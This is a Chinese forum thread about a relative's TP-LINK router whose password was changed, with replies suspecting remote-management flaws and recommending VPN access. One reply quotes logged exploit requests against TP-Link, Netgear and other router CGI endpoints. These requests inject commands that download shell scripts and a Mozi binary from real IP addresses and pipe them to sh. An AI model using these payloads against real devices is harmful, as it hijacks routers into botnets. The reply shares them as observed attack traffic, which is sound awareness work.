路由器是 TP-LINK,路由器密码也不是我以前记的那个了。
1
anson264556364 5 天前
然后呢?
|
![]() |
2
programApe OP @anson264556364 密码和以前设置的不一样了,等晚上亲戚回去把设备重置下看看,感觉可能是 tp-link 远程管理有漏洞。
|
3
allplay 5 天前 via Android
tp link 远程管理?你从 wan 口进入?
这是找死,迟早的事 |
4
allplay 5 天前 via Android
应该 vpn 或者内网穿透,然后 lan 设备去管理它
|
5
shum02 5 天前
以前遇到过家里的 padavan 被恶意改了 DNS ,公网进去改的应该是。
|
6
xyz3210 5 天前
我是桥接的!
|
8
2397613259qqq 5 天前
从外回家管理路由最佳实践是 vpn ,或者 ssh tunnel ,不要直接暴露管理入口在公网上,路由器这种东西没有及时更新很容易被滥用
|
9
dpx 5 天前
服务器经常会收到一些利用漏洞攻击路由器的请求如
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://49.130.26.13:39255/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 /cgi-bin/shortcut_telnet.cgi?wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.wyu.sh%7Csh%26 /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F¤tsetting.htm=1 /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.djc.sh%7Csh%3B%27 |
![]() |
11
titanium98118 4 天前 via Android
80 端口能通吗?
|
![]() |
12
programApe OP @titanium98118 不通,老家的网,没弄公网 ip 、没 ipv6 、没桥接。可能的原因是 tp-link 的那个物联 app 管理,或者是装宽带的小哥干的?目前也只有这两种可能性了。
|
16
aru 1 天前
似乎某些路由器固件有漏洞
当你访问恶意网站的时候会被上面的脚本发起内网 http 请求修改路由器配置 |